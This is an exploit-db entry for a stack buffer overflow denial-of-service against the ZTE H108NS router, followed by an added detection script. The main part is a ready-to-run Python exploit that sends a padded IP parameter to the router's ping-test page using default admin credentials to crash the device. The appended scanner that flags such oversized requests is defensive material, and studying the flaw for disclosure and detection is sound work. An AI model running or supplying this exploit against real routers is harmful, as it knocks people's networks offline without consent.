
[dos] Router ZTE-H108NS - Stack Buffer Overflow (DoS)

source link: https://www.exploit-db.com/exploits/51137

EDB-ID: 51137
Platform: Hardware
Date: 2023-03-30

# Exploit Title: ZTE-H108NS -  Stack Buffer Overflow (DoS)
# Date: 19-11-2022
# Exploit Author: George Tsimpidas 
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# Usage: python zte-exploit.py <victim-ip> <port>
# CVE: N/A 
# Tested on: Debian 5.18.5

#!/usr/bin/python3


import sys
import socket
from time import sleep

host = sys.argv[1]  # Receive IP from user
port = int(sys.argv[2])  # Receive port from user

junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae" * 5


buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1" + junk + b"&TestBtn=START HTTP/1.1\r\n"
buffer += b"Host: 192.168.1.1\r\n"
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n"
buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
buffer += b"Connection: Keep-Alive\r\n"
buffer += b"Cookie: SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2; _TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"




print("[*] Sending evil payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
print("[+] Crashing boom boom ~ check if target is down ;)")
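
A detection-side companion to the request above, added here as an example and not part of the original exploit-db entry: it scans HTTP request lines (from a proxy log or packet capture) for an over-long IP parameter sent to /cgi-bin/tools_test.asp. The 253-character limit assumes the field legitimately holds an IP address or DNS name; the function names and sample lines are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

TARGET_PATH = "/cgi-bin/tools_test.asp"  # endpoint requested by the PoC above
TARGET_PARAM = "IP"                      # parameter the PoC pads with filler
MAX_HOST_LEN = 253                       # assumption: field holds an IP or DNS name


def oversized_ping_target(request_line):
    """Return the length of an over-long IP value, or None if the line is fine."""
    fields = request_line.strip().split(" ")
    if len(fields) != 3:  # not "METHOD target HTTP/x.y"
        return None
    parts = urlsplit(fields[1])
    if parts.path.lower() != TARGET_PATH:
        return None
    # parse_qsl percent-decodes values and keeps repeated parameters,
    # so an encoded or duplicated IP field is measured as well.
    lengths = [len(value)
               for key, value in parse_qsl(parts.query, keep_blank_values=True)
               if key == TARGET_PARAM]
    worst = max(lengths, default=0)
    return worst if worst > MAX_HOST_LEN else None


def scan(request_lines):
    """Return (line_number, value_length) for every suspicious request line."""
    hits = []
    for number, line in enumerate(request_lines, start=1):
        length = oversized_ping_target(line)
        if length is not None:
            hits.append((number, length))
    return hits


# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1&TestBtn=START HTTP/1.1",
    "GET /index.asp?IP=" + "A" * 700 + " HTTP/1.1",
    "GET /cgi-bin/tools_test.asp?testFlag=1&IP=192.168.1.1" + "A" * 700 + "&TestBtn=START HTTP/1.1",
    "GET /cgi-bin/tools_test.asp?IP=10.0.0.1&IP=" + "%41" * 300 + " HTTP/1.1",
]

if __name__ == "__main__":
    for number, length in scan(SAMPLE):
        print(f"line {number}: {TARGET_PARAM} value is {length} characters")
```
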
            
